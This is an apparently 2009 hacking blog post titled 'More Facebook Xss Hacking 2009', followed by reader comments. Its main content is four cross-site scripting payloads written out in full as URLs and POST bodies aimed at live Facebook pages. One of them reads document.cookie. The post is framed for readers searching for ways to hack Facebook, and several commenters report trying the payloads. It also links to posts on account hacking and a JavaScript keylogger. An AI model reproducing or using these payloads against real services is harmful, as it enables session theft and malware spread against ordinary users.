More Facebook Xss Hacking 2009

Facebook's new homepage features a login form ...
Image via Wikipedia

If I have mentioned some security flaw that Facebook ever faced , like how to view facebook private profile pictures , some another facebook security flaws just have been discovered during the late 2008 until January 2009. And I’m pretty sure there will be more facebook xss hacking in 2009 . Some major facebook xss vulnerabilities has been published on Xssed.com (the most well-known website for xss news). And of course , you’re very allowed to leave this post if you still think Xss is not dangerous at all :) . Some critical Facebook Xss flaws can infect million facebook members with malware. And it’s not impossible for a new facebook xss worm to be developed under these circumstances.

The first Facebook xss vulnerability was occured on facebook reset password page :
XSS:
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Mirror : http://www.xssed.com/mirror/55951/

The 2nd : (with POST)
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F

POST:

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

The 3rd :
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E

The 4th : (with POST)
http://developers.facebook.com/tools.php?fbml

POST:

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=

Random articles :

Computer Security Stuff on eBay!
Electronics stuffs on ebay

More Facebook Xss Hacking 2009 is posted on January 26th, 2009 by admin. This post is filed under: Security, exploits, , , , , , , , .

Some people come to this post with this search term: hack facebook 2009, facebook hack 2009, facebook xss, facebook hacks 2009, hacking facebook, view private Facebook profiles, HACKING FACEBOOK 2009, m, xss facebook, facebook hacking 2009, facebook photo hack 2009, hacking 2009, facebook hacking, hacking facebook photos, hack facebook photos 2009, facebook hacked 2009, facebook private 2009, hacking facebook pictures, 2009 facebook hacks, view private facebook 2009,

And here is the related entries of this post:

7 Responses to “More Facebook Xss Hacking 2009”

  1. Kate, on February 19th, 2009 at 3:01 am Said:

    I downloaded mozilla firefox and tried entering the private Id as instructed but It keeps saying that I have an invalid Id?
    Help!!

  2. Aron Tanner, on March 4th, 2009 at 5:36 am Said:

    One more reason to use a mac ;)

  3. Kamden Wilder, on March 4th, 2009 at 5:42 am Said:

    uhm, you have to run exe, you retards. It wouldn?t matter what platform you were using.

  4. Ellis Cantu, on March 4th, 2009 at 5:57 am Said:

    ok, so i think the big question is? how do we fix this?!

  5. abuanonam, on March 22nd, 2009 at 2:04 am Said:

    em.. you can call me for fix it.

    am can help for development of facebook

  6. View Private Facebook Profile, on May 8th, 2009 at 10:16 pm Said:

    I actually think hack 2 and 4 have been fixed.

  7. k.lil, on October 23rd, 2009 at 1:06 pm Said:

    i tried all of them.. so far doesnt work.. =(

Leave a Reply

« myspace account hacking - does your wife cheat on you? hack password facebook with javascript keylogger »